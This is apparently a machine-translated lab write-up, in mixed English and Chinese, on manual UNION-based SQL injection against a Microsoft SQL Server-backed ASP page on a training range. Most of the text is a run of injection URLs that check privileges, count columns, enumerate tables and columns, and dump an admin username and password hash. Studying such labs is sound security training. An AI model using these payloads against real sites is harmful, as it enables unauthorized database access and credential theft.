saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Note Microsoft SQL Server hands of the joint inquiry injection
Mssql database Introduction
SQL Server
It is Microsoft
introduced relational database management systems. Easy to use software with a good scalability advantages of high degree of integration, can span from large multi-processor running Microsoft Windows 98 laptop computer to run the Microsoft Windows 2012 Server and other platforms.
Microsoft SQL Server
It is a comprehensive database platform, using integrated business intelligence (BI) tools provide enterprise-class data management. Microsoft SQL Server
Database engine provides more secure, reliable storage capabilities for relational data and structured data, so you can build and manage high-availability and high-performance data applications for business.
Mssql database, test environment
Complete installation SQL Server 2008
database: https: //jingyan.baidu.com/article/948f592434b407d80ef5f97d.html
Mssql database permissions Introduction
sa权限:数据库操作,文件管理,命令执行,注册表读取等:相当于system
db权限:文件管理、数据库操作等等:相当于users-administrators
public权限:数据库操作:相当于guest-users
Mssql database calling code
<%
set conn =server.createobject("adodb.connection") conn.open "provider=sqloledb;source=local;uid=sa;pwd=******;database=database-name"
%>
注释:uid:账号, pwd:密码
Mssql database injected by hand
Determine whether the Mssql database
Enter the SQL
statement, if 返回正常
then that is the database used for the site Mssql
database, because Mssql
the database has a default sysobjects
table.
SQL statement to determine permissions
and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限
and 1=(select is_srvrolemember('public')) //判断是否为public权限
SQL injection vulnerability testing manual (Sql Server database)
Range Address: https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe
Injection site: http: //219.153.49.228: 42837 / new_list.asp id = 2?
Determine whether the Mssql
http://219.153.49.228:42837/new_list.asp?id=2 and exists(select * from sysobjects)
Return to normal, indicating that the database site is in Mssql
!
Analyzing field length
http://219.153.49.228:42837/new_list.asp?id=2 order by 5
order by 5
We push forward an error is returned:
http://219.153.49.228:42837/new_list.asp?id=2 order by 4
order by 4
Return to normal, the description field is a length of 4!
Looking for character display position
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,null,null,null
这里使用的是 union all,它和 union select 的区别就是:union select 会自动去除一些重复的字段!
在这个靶场使用 union select 是不行的,所以我们就用 union all
然后我使用的 null 是说明它无关是字符型还是数字型
Next we one by one to guess its display position:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select '1',null,null,null
'1'
He no response, indicating that it is not the first one, then we continue the investigation to the next null
:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,'2',null,null
This time he had a digital page "2"
, indicating that 2
this position we can to take advantage of it!
We continue to look at the third place:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,'2','3',null
It can be seen on our pages out of an addition ‘3’
, a third one digit display can also go to use!
We look at the fourth (actually two digit display will suffice):
I guess the fourth page when there is no response, indicating that it only exists ‘2’
, ‘3’
two display bits!
Other relevant information
Now that we have the display position, then we can use the site to display query information we want to get!
@@version-:获取版本信息
db_name():数据库名字
user,system_user,current_user,user_name:获取当前⽤户名
@@SERVERNAME:获取有关服务器主机的信息
Obtain version information
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,@@version,'3',null
Gets the database name
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,db_name(),'3',null
Get the current database name
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,user,'3',null
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,system_user,'3',null
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,current_user,'3',null
Queries show
http://219.153.49.228:42837/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4
Check out here represents the first manage
, and then we go check a second (here my drone to restart a bit, so the port changed):
http://219.153.49.228:43946/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),'3',4
注释:name not in ('manage') 这段语句意思是查询 name 不是 'manage' 的,这样就可以排除 'manage' 从而查询下一个表名
Check out the second table name announcement
, if you want to continue the investigation, then continue with not in
this inquiry judge on the line!
Gets the column name
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
注释:col_name 是查询的列名,object_id('manage')是从manage这个表里查询,1 代表的是查询第一个列名
Here, check out the first column name id
, we continue to search the second column name just need to modify the number 1 to 2 on the line col_name(object_id('manage'),2
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
Check out the second column name username
, we continue to query the third column names:
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
The third column name is password
, this time we get username
and password
columns!
retrieve data
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,username, password ,null from manage
This time we injected out of his account: admin_mz
password 72e1bfc3f01b7583
!